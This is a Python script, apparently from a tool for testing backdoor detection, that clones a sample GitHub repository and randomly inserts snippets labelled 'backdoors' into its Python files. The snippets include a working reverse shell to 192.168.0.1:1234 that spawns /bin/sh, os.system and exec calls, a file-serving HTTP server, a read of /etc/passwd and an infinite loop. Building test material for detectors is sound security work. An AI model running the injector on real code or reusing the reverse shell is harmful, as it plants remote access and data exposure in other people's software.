180 lines
		
	
	
		
			4.2 KiB
		
	
	
	
		
			Python
		
	
	
	
	
	
			
		
		
	
	
			180 lines
		
	
	
		
			4.2 KiB
		
	
	
	
		
			Python
		
	
	
	
	
	
| from typing import Tuple
 | |
| from git import Repo  
 | |
| import random
 | |
| from pathlib import Path
 | |
| 
 | |
| 
 | |
| def clone_repo(repo_url: str, clone_dir: str) -> None:
 | |
|     """
 | |
|     Clone a Git repository to the specified directory.
 | |
| 
 | |
|     Args:
 | |
|         repo_url (str): The URL of the Git repository to clone.
 | |
|         clone_dir (str): The directory where the repository should be cloned.
 | |
|     """
 | |
|     try:
 | |
|         Repo.clone_from(repo_url, clone_dir, depth=1)
 | |
|     except Exception as e:
 | |
|         print(f"Error cloning repository: {e}")
 | |
| 
 | |
| 
 | |
| def inject_random_backdoor(
 | |
|     path: str, pickle: bool = False, pyc: bool = False, sample_rate: float = 0.1
 | |
| ) -> int:
 | |
|     """
 | |
|     Insert random backdoor into the path.
 | |
| 
 | |
|     Args:
 | |
|         path (str): The path to the repository to insert the backdoor into.
 | |
|         pickle (bool): Whether to insert a backdoor into a pickle file.
 | |
|         pyc (bool): Whether to insert a backdoor into a compiled Python file.
 | |
|     """
 | |
|     if pickle:
 | |
|         inject_pickle_backdoor(path)
 | |
|     if pyc:
 | |
|         inject_pyc_backdoor(path)
 | |
| 
 | |
|     project_path = Path(path)
 | |
|     all_python_files = list(project_path.rglob("*.py"))
 | |
|     injected_python_files = []
 | |
| 
 | |
|     for python_file in all_python_files:
 | |
|         # sample files to inject backdoor
 | |
|         if random.random() < sample_rate:
 | |
|             injected_python_files.append(python_file)
 | |
|     injectedNum = len(injected_python_files)
 | |
|     for python_file in injected_python_files:
 | |
|         with open(python_file, "r+",errors="ignore") as f:
 | |
|             lines = f.readlines()
 | |
|             total_lines = len(lines)
 | |
|             inject_line_number = random.randint(0, total_lines)
 | |
|             inject_code = random.choice(backdoors)
 | |
| 
 | |
|             lines.insert(inject_line_number, inject_code + "\n")
 | |
| 
 | |
|             # Move the file pointer to the beginning of the file
 | |
|             f.seek(0)
 | |
| 
 | |
|             # Write the modified content back to the file
 | |
|             f.writelines(lines)
 | |
|     return injectedNum
 | |
| 
 | |
| 
 | |
| # 示例1: 通过 os.system 执行命令
 | |
| backdoor1 = """
 | |
| import os
 | |
| os.system('ls')
 | |
| """
 | |
| 
 | |
| # 示例2: 通过 subprocess 模块执行命令
 | |
| backdoor2 = """
 | |
| import subprocess
 | |
| subprocess.call(['ls', '-l'])
 | |
| """
 | |
| 
 | |
| # 示例3: 打开一个反向 shell
 | |
| backdoor3 = """
 | |
| import socket,subprocess,os
 | |
| s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
 | |
| s.connect(("192.168.0.1",1234))
 | |
| os.dup2(s.fileno(),0)
 | |
| os.dup2(s.fileno(),1)
 | |
| os.dup2(s.fileno(),2)
 | |
| subprocess.call(["/bin/sh","-i"])
 | |
| """
 | |
| 
 | |
| # 示例4: 通过 eval 执行任意代码
 | |
| backdoor4 = """
 | |
| code = "print('Hello, World!')"
 | |
| eval(code)
 | |
| """
 | |
| 
 | |
| # 示例5: 通过 exec 执行任意代码
 | |
| backdoor5 = """
 | |
| code = '''
 | |
| import os
 | |
| os.system('ls')
 | |
| '''
 | |
| exec(code)
 | |
| """
 | |
| 
 | |
| # 示例6: 简单的 HTTP 服务器后门
 | |
| backdoor6 = """
 | |
| import http.server
 | |
| import socketserver
 | |
| 
 | |
| PORT = 8000
 | |
| 
 | |
| Handler = http.server.SimpleHTTPRequestHandler
 | |
| 
 | |
| with socketserver.TCPServer(("", PORT), Handler) as httpd:
 | |
|     print("serving at port", PORT)
 | |
|     httpd.serve_forever()
 | |
| """
 | |
| 
 | |
| # 示例7: 读取并显示文件内容
 | |
| backdoor7 = """
 | |
| with open('/etc/passwd', 'r') as file:
 | |
|     data = file.read()
 | |
|     print(data)
 | |
| """
 | |
| 
 | |
| # 示例8: 无限循环
 | |
| backdoor8 = """
 | |
| while True:
 | |
|     print("This is a backdoor.")
 | |
| """
 | |
| 
 | |
| backdoors = [
 | |
|     backdoor1,
 | |
|     backdoor2,
 | |
|     backdoor3,
 | |
|     backdoor4,
 | |
|     backdoor5,
 | |
|     backdoor6,
 | |
|     backdoor7,
 | |
|     backdoor8,
 | |
| ]
 | |
| 
 | |
| 
 | |
| def inject_pickle_backdoor(path: str) -> None:
 | |
|     """
 | |
|     Generate a pickle backdoor and insert it into the specified path.
 | |
| 
 | |
|     Args:
 | |
|         path (str): The path to the repository to insert the backdoor into.
 | |
|     """
 | |
|     pass
 | |
| 
 | |
| 
 | |
| def inject_pyc_backdoor(path: str) -> None:
 | |
|     """
 | |
|     Generate a pyc backdoor and insert it into the specified path.
 | |
| 
 | |
|     Args:
 | |
|         path (str): The path to the repository to insert the backdoor into.
 | |
|     """
 | |
|     pass
 | |
| 
 | |
| 
 | |
| def check_accuracy(report_file: str, backdoor_location: Tuple[str, int]) -> float:
 | |
|     """
 | |
|     Check the accuracy of the backdoor insertion.
 | |
| 
 | |
|     Args:
 | |
|         report_file (str): The path to the report file.
 | |
|         backdoor_location (Tuple[str, int]): The location of the backdoor in the repository.
 | |
| 
 | |
|     Returns:
 | |
|         float: The accuracy rate of the backdoor insertion.
 | |
|     """
 | |
|     accuracy_rate = 0.0
 | |
| 
 | |
|     return accuracy_rate
 | |
| 
 | |
| 
 | |
| if __name__ == "__main__":
 | |
|     repo_url = "https://github.com/TheAlgorithms/Python.git"
 | |
|     clone_dir = "/tmp/repo"
 | |
|     clone_repo(repo_url, clone_dir)
 |